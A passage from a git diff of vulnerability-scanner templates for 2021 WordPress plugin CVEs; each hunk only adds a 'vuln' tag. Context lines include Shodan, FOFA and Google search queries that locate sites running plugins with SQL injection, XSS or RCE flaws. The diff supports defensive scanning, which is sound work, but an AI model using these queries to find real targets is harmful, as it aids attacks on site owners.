2659c95a2df..cf54f043188 100644 --- a/http/cves/2021/CVE-2021-24527.yaml +++ b/http/cves/2021/CVE-2021-24527.yaml @@ -24,7 +24,7 @@ info: vendor: cozmoslabs product: profile-builder publicwww-query: "/wp-content/plugins/profile-builder/" - tags: cve,cve2021,wp,wp-plugin,wordpress,profile-builder,vkev + tags: cve,cve2021,wp,wp-plugin,wordpress,profile-builder,vkev,vuln variables: pass: "{{to_lower(rand_text_alpha(12))}}" diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index 7d0bcb57d5f..9e5a895315b 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -30,7 +30,7 @@ info: vendor: freelancetoindia product: paytm-pay framework: wordpress - tags: time-based-sqli,cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia + tags: time-based-sqli,cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24627.yaml b/http/cves/2021/CVE-2021-24627.yaml index 95aaa12536e..835ce31bd91 100644 --- a/http/cves/2021/CVE-2021-24627.yaml +++ b/http/cves/2021/CVE-2021-24627.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/g-auto-hyperlink/ fofa-query: body=/wp-content/plugins/g-auto-hyperlink/ publicwww-query: /wp-content/plugins/g-auto-hyperlink/ - tags: cve2021,cve,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated,g_auto-hyperlink_project + tags: cve2021,cve,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated,g_auto-hyperlink_project,vuln variables: num: 999999999 diff --git a/http/cves/2021/CVE-2021-24644.yaml b/http/cves/2021/CVE-2021-24644.yaml index 328ffbe8ede..e66085e78bd 100644 --- a/http/cves/2021/CVE-2021-24644.yaml +++ b/http/cves/2021/CVE-2021-24644.yaml @@ -25,7 +25,7 @@ info: product: images_to_webp framework: wordpress publicwww-query: "/wp-content/plugins/images-to-webp/" - tags: wpscan,cve,cve2021,wordpress,wp-plugin,images-to-webp,lfi,authenticated,intrusive,vkev + tags: wpscan,cve,cve2021,wordpress,wp-plugin,images-to-webp,lfi,authenticated,intrusive,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-24647.yaml b/http/cves/2021/CVE-2021-24647.yaml index c6dfbf6189c..cfc5374a1bd 100644 --- a/http/cves/2021/CVE-2021-24647.yaml +++ b/http/cves/2021/CVE-2021-24647.yaml @@ -27,7 +27,7 @@ info: vendor: genetechsolutions product: pie_register framework: wordpress - tags: cve,cve2021,unauth,pie-register,wpscan,wp-plugin,wordpress,wp,genetechsolutions,vkev + tags: cve,cve2021,unauth,pie-register,wpscan,wp-plugin,wordpress,wp,genetechsolutions,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24666.yaml b/http/cves/2021/CVE-2021-24666.yaml index d3b83def487..09726a5405f 100644 --- a/http/cves/2021/CVE-2021-24666.yaml +++ b/http/cves/2021/CVE-2021-24666.yaml @@ -28,7 +28,7 @@ info: vendor: podlove product: podlove_podcast_publisher framework: wordpress - tags: cve2021,cve,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,podlove,vkev + tags: cve2021,cve,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,podlove,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index 33784d6b84a..5b4a5f092e7 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -27,7 +27,7 @@ info: vendor: genetechsolutions product: pie_register framework: wordpress - tags: time-based-sqli,cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth,genetechsolutions + tags: time-based-sqli,cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth,genetechsolutions,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24746.yaml b/http/cves/2021/CVE-2021-24746.yaml index 8ec8cc4e4f1..28c3726f3c8 100644 --- a/http/cves/2021/CVE-2021-24746.yaml +++ b/http/cves/2021/CVE-2021-24746.yaml @@ -27,7 +27,7 @@ info: product: sassy_social_share framework: wordpress google-query: inurl:"/wp-content/plugins/sassy-social-share" - tags: cve,cve2021,wordpress,wp-plugin,xss,wp,wpscan,heateor + tags: cve,cve2021,wordpress,wp-plugin,xss,wp,wpscan,heateor,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml index e310aec272b..6e93304c8bb 100644 --- a/http/cves/2021/CVE-2021-24750.yaml +++ b/http/cves/2021/CVE-2021-24750.yaml @@ -28,7 +28,7 @@ info: vendor: wp_visitor_statistics_\(real_time_traffic\)_project product: wp_visitor_statistics_\(real_time_traffic\) framework: wordpress - tags: cve2021,cve,authenticated,wpscan,sqli,wp,wordpress,wp-plugin,wp_visitor_statistics_\(real_time_traffic\)_project,vkev + tags: cve2021,cve,authenticated,wpscan,sqli,wp,wordpress,wp-plugin,wp_visitor_statistics_\(real_time_traffic\)_project,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml index 400354842ce..07f8a0d3035 100644 --- a/http/cves/2021/CVE-2021-24762.yaml +++ b/http/cves/2021/CVE-2021-24762.yaml @@ -28,7 +28,7 @@ info: vendor: getperfectsurvey product: perfect_survey framework: wordpress - tags: time-based-sqli,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey,vkev + tags: time-based-sqli,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24791.yaml b/http/cves/2021/CVE-2021-24791.yaml index 81ab4aa666e..27cc36fd10e 100644 --- a/http/cves/2021/CVE-2021-24791.yaml +++ b/http/cves/2021/CVE-2021-24791.yaml @@ -26,7 +26,7 @@ info: product: header_footer_code_manager framework: wordpress google-query: inurl:"/wp-content/plugins/wp-custom-pages/" - tags: time-based-sqli,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress + tags: time-based-sqli,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml index cb4cfc800b5..a3bcf0c770a 100644 --- a/http/cves/2021/CVE-2021-24827.yaml +++ b/http/cves/2021/CVE-2021-24827.yaml @@ -30,7 +30,7 @@ info: vendor: asgaros product: asgaros_forum framework: wordpress - tags: time-based-sqli,cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros,vkev + tags: time-based-sqli,cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml index e78df6c50b9..eb499ab3a1d 100644 --- a/http/cves/2021/CVE-2021-24838.yaml +++ b/http/cves/2021/CVE-2021-24838.yaml @@ -29,7 +29,7 @@ info: vendor: bologer product: anycomment framework: wordpress - tags: cve2021,cve,redirect,anycomment,wpscan,wordpress,wp-plugin,bologer + tags: cve2021,cve,redirect,anycomment,wpscan,wordpress,wp-plugin,bologer,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24849.yaml b/http/cves/2021/CVE-2021-24849.yaml index bc91220ded7..2778ec5c128 100644 --- a/http/cves/2021/CVE-2021-24849.yaml +++ b/http/cves/2021/CVE-2021-24849.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/wc-multivendor-marketplace fofa-query: body=/wp-content/plugins/wc-multivendor-marketplace publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace" - tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers + tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index 1f8f48c140f..d47efaac4ea 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -29,7 +29,7 @@ info: vendor: metagauss product: registrationmagic framework: wordpress - tags: time-based-sqli,cve,cve2021,wpscan,wp-plugin,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss + tags: time-based-sqli,cve,cve2021,wpscan,wp-plugin,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml index 595c24e83cf..26e4cdc0e57 100644 --- a/http/cves/2021/CVE-2021-24875.yaml +++ b/http/cves/2021/CVE-2021-24875.yaml @@ -28,7 +28,7 @@ info: vendor: implecode product: ecommerce_product_catalog framework: wordpress - tags: cve2021,cve,wp,authenticated,wpscan,ecommerce-product-catalog,xss,wordpress,wp-plugin,implecode + tags: cve2021,cve,wp,authenticated,wpscan,ecommerce-product-catalog,xss,wordpress,wp-plugin,implecode,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24876.yaml b/http/cves/2021/CVE-2021-24876.yaml index 874db517e46..70ed0df059a 100644 --- a/http/cves/2021/CVE-2021-24876.yaml +++ b/http/cves/2021/CVE-2021-24876.yaml @@ -24,7 +24,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/registrations-for-the-events-calendar/" publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/" - tags: cve,cve2021,wordpress,wpscan,wp-plugin,wp,registrations-for-the-events-calendar,xss,authenticated,vkev + tags: cve,cve2021,wordpress,wpscan,wp-plugin,wp,registrations-for-the-events-calendar,xss,authenticated,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-24878.yaml b/http/cves/2021/CVE-2021-24878.yaml index b0f0df71c5d..fadcb2cef84 100644 --- a/http/cves/2021/CVE-2021-24878.yaml +++ b/http/cves/2021/CVE-2021-24878.yaml @@ -27,7 +27,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/supportcandy/" publicwww-query: "/wp-content/plugins/supportcandy/" - tags: cve,cve2021,wordpress,wpscan,wp-plugin,supportcandy,xss,vkev + tags: cve,cve2021,wordpress,wpscan,wp-plugin,supportcandy,xss,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index 1d15582c561..badc0235886 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -28,7 +28,7 @@ info: vendor: elementor product: "website_builder" framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,elementor,wpscan,dom,xss,passive + tags: cve2021,cve,wordpress,wp-plugin,elementor,wpscan,dom,xss,passive,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24910.yaml b/http/cves/2021/CVE-2021-24910.yaml index ed6e8dd0332..e41fd5714d1 100644 --- a/http/cves/2021/CVE-2021-24910.yaml +++ b/http/cves/2021/CVE-2021-24910.yaml @@ -29,7 +29,7 @@ info: vendor: transposh product: transposh_wordpress_translation framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,xss,wp,wpscan,transposh + tags: cve2021,cve,wordpress,wp-plugin,xss,wp,wpscan,transposh,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24915.yaml b/http/cves/2021/CVE-2021-24915.yaml index dc523d18f07..735842ff6c0 100644 --- a/http/cves/2021/CVE-2021-24915.yaml +++ b/http/cves/2021/CVE-2021-24915.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/contest-gallery/ fofa-query: body=/wp-content/plugins/contest-gallery/ publicwww-query: "/wp-content/plugins/contest-gallery/" - tags: cve2021,cve,wordpress,wp-plugin,wpscan,wp,contest-gallery,contest_gallery,sqli + tags: cve2021,cve,wordpress,wp-plugin,wpscan,wp,contest-gallery,contest_gallery,sqli,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml index 21635e6c9fd..7056a1dfd69 100644 --- a/http/cves/2021/CVE-2021-24917.yaml +++ b/http/cves/2021/CVE-2021-24917.yaml @@ -28,7 +28,7 @@ info: vendor: wpserveur product: wps_hide_login framework: wordpress - tags: cve2021,cve,wp,wordpress,wp-plugin,unauth,wpscan,wpserveur + tags: cve2021,cve,wp,wordpress,wp-plugin,unauth,wpscan,wpserveur,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24926.yaml b/http/cves/2021/CVE-2021-24926.yaml index b5b14de5195..1dd9fc401e3 100644 --- a/http/cves/2021/CVE-2021-24926.yaml +++ b/http/cves/2021/CVE-2021-24926.yaml @@ -25,7 +25,7 @@ info: vendor: domaincheckplugin product: domain_check framework: wordpress - tags: cve,cve2021,wpscan,xss,wp,wordpress,wp-plugin,authenticated,domaincheckplugin + tags: cve,cve2021,wpscan,xss,wp,wordpress,wp-plugin,authenticated,domaincheckplugin,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24931.yaml b/http/cves/2021/CVE-2021-24931.yaml index 881138bc890..73a1e7ecf37 100644 --- a/http/cves/2021/CVE-2021-24931.yaml +++ b/http/cves/2021/CVE-2021-24931.yaml @@ -28,7 +28,7 @@ info: vendor: ays-pro product: secure_copy_content_protection_and_content_locking framework: wordpress - tags: time-based-sqli,cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro,vkev + tags: time-based-sqli,cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24934.yaml b/http/cves/2021/CVE-2021-24934.yaml index 04bc0cc5c53..cdae58cec4f 100644 --- a/http/cves/2021/CVE-2021-24934.yaml +++ b/http/cves/2021/CVE-2021-24934.yaml @@ -25,7 +25,7 @@ info: product: visual_css_style_editor framework: wordpress publicwww-query: "/wp-content/plugins/yellow-pencil-visual-theme-customizer" - tags: cve,cve2021,wordpress,wp,wp-plugin,yellowpencil,xss,authenticated + tags: cve,cve2021,wordpress,wp,wp-plugin,yellowpencil,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml index 3463bae3f18..df1f483ebc3 100644 --- a/http/cves/2021/CVE-2021-24940.yaml +++ b/http/cves/2021/CVE-2021-24940.yaml @@ -28,7 +28,7 @@ info: vendor: woocommerce product: persian-woocommerce framework: wordpress - tags: cve2021,cve,wp,xss,authenticated,wpscan,wordpress,wp-plugin,woocommerce + tags: cve2021,cve,wp,xss,authenticated,wpscan,wordpress,wp-plugin,woocommerce,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24943.yaml b/http/cves/2021/CVE-2021-24943.yaml index 3139645118d..644d9ef9be5 100644 --- a/http/cves/2021/CVE-2021-24943.yaml +++ b/http/cves/2021/CVE-2021-24943.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/registrations-for-the-events-calendar/ fofa-query: body=/wp-content/plugins/registrations-for-the-events-calendar/ publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/" - tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp,vkev + tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp,vkev,vuln variables: text: "{{rand_base(5)}}" diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index 26ed19a417d..c4cec098c82 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -30,7 +30,7 @@ info: vendor: webnus product: modern_events_calendar_lite framework: wordpress - tags: time-based-sqli,cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus,vkev + tags: time-based-sqli,cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml index dca185518be..3f44c8c42ec 100644 --- a/http/cves/2021/CVE-2021-24947.yaml +++ b/http/cves/2021/CVE-2021-24947.yaml @@ -28,7 +28,7 @@ info: vendor: thinkupthemes product: responsive_vector_maps framework: wordpress - tags: cve2021,cve,authenticated,wpscan,lfi,wp,wordpress,wp-plugin,lfr,thinkupthemes + tags: cve2021,cve,authenticated,wpscan,lfi,wp,wordpress,wp-plugin,lfr,thinkupthemes,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24956.yaml b/http/cves/2021/CVE-2021-24956.yaml index 86829e646c2..51465b4c1cb 100644 --- a/http/cves/2021/CVE-2021-24956.yaml +++ b/http/cves/2021/CVE-2021-24956.yaml @@ -26,7 +26,7 @@ info: vendor: adenion product: blog2social framework: wordpress - tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan,adenion + tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan,adenion,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml index f02351dd61e..9bfc3a0e1bb 100644 --- a/http/cves/2021/CVE-2021-24970.yaml +++ b/http/cves/2021/CVE-2021-24970.yaml @@ -28,7 +28,7 @@ info: vendor: plugins360 product: all-in-one_video_gallery framework: wordpress - tags: cve2021,cve,wpscan,wp,wp-plugin,wordpress,lfi,authenticated,plugins360 + tags: cve2021,cve,wpscan,wp,wp-plugin,wordpress,lfi,authenticated,plugins360,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24979.yaml b/http/cves/2021/CVE-2021-24979.yaml index c40df98c12f..d74ce0761a6 100644 --- a/http/cves/2021/CVE-2021-24979.yaml +++ b/http/cves/2021/CVE-2021-24979.yaml @@ -29,7 +29,7 @@ info: fofa-query: body=/wp-content/plugins/paid-memberships-pro/ publicwww-query: /wp-content/plugins/paid-memberships-pro/ google-query: inurl:"/wp-content/plugins/paid-memberships-pro" - tags: cve2021,cve,wp,wordpress,wpscan,wp-plugin,xss,authenticated,strangerstudios + tags: cve2021,cve,wp,wordpress,wpscan,wp-plugin,xss,authenticated,strangerstudios,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24987.yaml b/http/cves/2021/CVE-2021-24987.yaml index d1e9e32a135..3238c26b1b6 100644 --- a/http/cves/2021/CVE-2021-24987.yaml +++ b/http/cves/2021/CVE-2021-24987.yaml @@ -26,7 +26,7 @@ info: vendor: heateor product: super_socializer framework: wordpress - tags: cve2021,cve,wpscan,xss,wp,wp-plugin,wordpress,heateor + tags: cve2021,cve,wpscan,xss,wp,wp-plugin,wordpress,heateor,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24991.yaml b/http/cves/2021/CVE-2021-24991.yaml index caa349434ca..e37e82f417b 100644 --- a/http/cves/2021/CVE-2021-24991.yaml +++ b/http/cves/2021/CVE-2021-24991.yaml @@ -27,7 +27,7 @@ info: vendor: wpovernight product: woocommerce_pdf_invoices\&_packing_slips framework: wordpress - tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan,wpovernight + tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan,wpovernight,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml index 7e5f7bb973c..a337dc1cd0b 100644 --- a/http/cves/2021/CVE-2021-24997.yaml +++ b/http/cves/2021/CVE-2021-24997.yaml @@ -28,7 +28,7 @@ info: vendor: wp-guppy product: wp_guppy framework: wordpress - tags: cve,cve2021,wordpress,guppy,api,wp-plugin,edb,wpscan,wp-guppy + tags: cve,cve2021,wordpress,guppy,api,wp-plugin,edb,wpscan,wp-guppy,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml index 5f11b525f2f..797879735ce 100644 --- a/http/cves/2021/CVE-2021-25003.yaml +++ b/http/cves/2021/CVE-2021-25003.yaml @@ -30,7 +30,7 @@ info: vendor: wptaskforce product: wpcargo_track_\&_trace framework: wordpress - tags: cve2021,cve,rce,wpcargo,unauth,wordpress,wp,wp-plugin,wpscan,intrusive,wptaskforce,vkev + tags: cve2021,cve,rce,wpcargo,unauth,wordpress,wp,wp-plugin,wpscan,intrusive,wptaskforce,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml index 91adc259024..96294b1c2cf 100644 --- a/http/cves/2021/CVE-2021-25008.yaml +++ b/http/cves/2021/CVE-2021-25008.yaml @@ -27,7 +27,7 @@ info: vendor: codesnippets product: code_snippets framework: wordpress - tags: cve,cve2021,authenticated,wpscan,xss,wp,wordpress,wp-plugin,codesnippets + tags: cve,cve2021,authenticated,wpscan,xss,wp,wordpress,wp-plugin,codesnippets,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25016.yaml b/http/cves/2021/CVE-2021-25016.yaml index f317e5cae7d..884cae4c166 100644 --- a/http/cves/2021/CVE-2021-25016.yaml +++ b/http/cves/2021/CVE-2021-25016.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/chaty/ fofa-query: body=/wp-content/plugins/chaty/ publicwww-query: "/wp-content/plugins/chaty/" - tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio + tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25028.yaml b/http/cves/2021/CVE-2021-25028.yaml index e4c8f0ae3ca..0b77b489689 100644 --- a/http/cves/2021/CVE-2021-25028.yaml +++ b/http/cves/2021/CVE-2021-25028.yaml @@ -23,7 +23,7 @@ info: vendor: tri product: event_tickets framework: wordpress - tags: cve2021,cve,wordpress,redirect,wp-plugin,eventtickets,wpscan,tri + tags: cve2021,cve,wordpress,redirect,wp-plugin,eventtickets,wpscan,tri,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-25032.yaml b/http/cves/2021/CVE-2021-25032.yaml index da597df5f28..ce788dba8ae 100644 --- a/http/cves/2021/CVE-2021-25032.yaml +++ b/http/cves/2021/CVE-2021-25032.yaml @@ -28,7 +28,7 @@ info: product: capabilities framework: wordpress fofa-query: body="/wp-content/plugins/capability-manager-enhanced" - tags: wpscan,cve,cve2021,wordpress,wp-plugin,wp,capability-manager-enhanced,authenticated,vkev + tags: wpscan,cve,cve2021,wordpress,wp-plugin,wp,capability-manager-enhanced,authenticated,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml index 1d6828d3d96..fd3eb4966ba 100644 --- a/http/cves/2021/CVE-2021-25033.yaml +++ b/http/cves/2021/CVE-2021-25033.yaml @@ -27,7 +27,7 @@ info: vendor: noptin product: noptin framework: wordpress - tags: cve2021,cve,wp,wpscan,wordpress,redirect,wp-plugin,noptin + tags: cve2021,cve,wp,wpscan,wordpress,redirect,wp-plugin,noptin,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml index c7a83e7d933..7295a118943 100644 --- a/http/cves/2021/CVE-2021-25052.yaml +++ b/http/cves/2021/CVE-2021-25052.yaml @@ -28,7 +28,7 @@ info: vendor: wow-company product: button_generator framework: wordpress - tags: cve2021,cve,wp-plugin,authenticated,wpscan,rfi,wp,wordpress,wow-company + tags: cve2021,cve,wp-plugin,authenticated,wpscan,rfi,wp,wordpress,wow-company,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml index 0d6b82a3011..fa69d5663c3 100644 --- a/http/cves/2021/CVE-2021-25055.yaml +++ b/http/cves/2021/CVE-2021-25055.yaml @@ -28,7 +28,7 @@ info: vendor: feedwordpress_project product: feedwordpress framework: wordpress - tags: cve2021,cve,wordpress,xss,wp-plugin,authenticated,wpscan,feedwordpress_project + tags: cve2021,cve,wordpress,xss,wp-plugin,authenticated,wpscan,feedwordpress_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml index 0aeccfa6339..c252c467943 100644 --- a/http/cves/2021/CVE-2021-25063.yaml +++ b/http/cves/2021/CVE-2021-25063.yaml @@ -27,7 +27,7 @@ info: vendor: cf7skins product: contact_form_7_skins framework: wordpress - tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,contactform,authenticated,cf7skins + tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,contactform,authenticated,cf7skins,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index 3a5c9fb8fbf..565a00f6d76 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.html:/wp-content/plugins/custom-facebook-feed/ fofa-query: body=/wp-content/plugins/custom-facebook-feed/ publicwww-query: "/wp-content/plugins/custom-facebook-feed/" - tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon + tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml index 46e3545550d..24dca44548c 100644 --- a/http/cves/2021/CVE-2021-25067.yaml +++ b/http/cves/2021/CVE-2021-25067.yaml @@ -29,7 +29,7 @@ info: vendor: pluginops product: landing_page framework: wordpress - tags: cve2021,cve,xss,wordpress,authenticated,wpscan,wp-plugin,wp,page-builder-add,pluginops + tags: cve2021,cve,xss,wordpress,authenticated,wpscan,wp-plugin,wp,page-builder-add,pluginops,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml index 99bb0115d36..6f37ea249a3 100644 --- a/http/cves/2021/CVE-2021-25074.yaml +++ b/http/cves/2021/CVE-2021-25074.yaml @@ -27,7 +27,7 @@ info: vendor: webp_converter_for_media_project product: webp_converter_for_media framework: wordpress - tags: cve2021,cve,redirect,wp-plugin,webpconverter,wpscan,wordpress,webp_converter_for_media_project + tags: cve2021,cve,redirect,wp-plugin,webpconverter,wpscan,wordpress,webp_converter_for_media_project,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml index ec6d0f7378f..3a891992fb1 100644 --- a/http/cves/2021/CVE-2021-25075.yaml +++ b/http/cves/2021/CVE-2021-25075.yaml @@ -28,7 +28,7 @@ info: vendor: wpdevart product: duplicate_page_or_post framework: wordpress - tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,authenticated,wpdevart + tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,authenticated,wpdevart,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml index 30ea3af9ef0..48c2a29524b 100644 --- a/http/cves/2021/CVE-2021-25078.yaml +++ b/http/cves/2021/CVE-2021-25078.yaml @@ -28,7 +28,7 @@ info: vendor: wpaffiliatemanager product: affiliates_manager framework: wordpress - tags: cve2021,cve,wp,wordpress,authenticated,affiliates-manager,wp-plugin,xss,wpscan,wpaffiliatemanager + tags: cve2021,cve,wp,wordpress,authenticated,affiliates-manager,wp-plugin,xss,wpscan,wpaffiliatemanager,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25079.yaml b/http/cves/2021/CVE-2021-25079.yaml index 2522bfc9061..fd5873de5cb 100644 --- a/http/cves/2021/CVE-2021-25079.yaml +++ b/http/cves/2021/CVE-2021-25079.yaml @@ -27,7 +27,7 @@ info: product: contact_form_entries framework: wordpress google-query: inurl:"/wp-content/plugins/contact-form-entries/" - tags: cve2021,cve,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss,crmperks + tags: cve2021,cve,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss,crmperks,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25085.yaml b/http/cves/2021/CVE-2021-25085.yaml index 08839fe88ec..20ff7e53a40 100644 --- a/http/cves/2021/CVE-2021-25085.yaml +++ b/http/cves/2021/CVE-2021-25085.yaml @@ -29,7 +29,7 @@ info: vendor: pluginus product: woocommerce_products_filter framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,wp,xss,wpscan,pluginus + tags: cve2021,cve,wordpress,wp-plugin,wp,xss,wpscan,pluginus,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-25094.yaml b/http/cves/2021/CVE-2021-25094.yaml index 6719d8387bc..52b665883a9 100644 --- a/http/cves/2021/CVE-2021-25094.yaml +++ b/http/cves/2021/CVE-2021-25094.yaml @@ -23,7 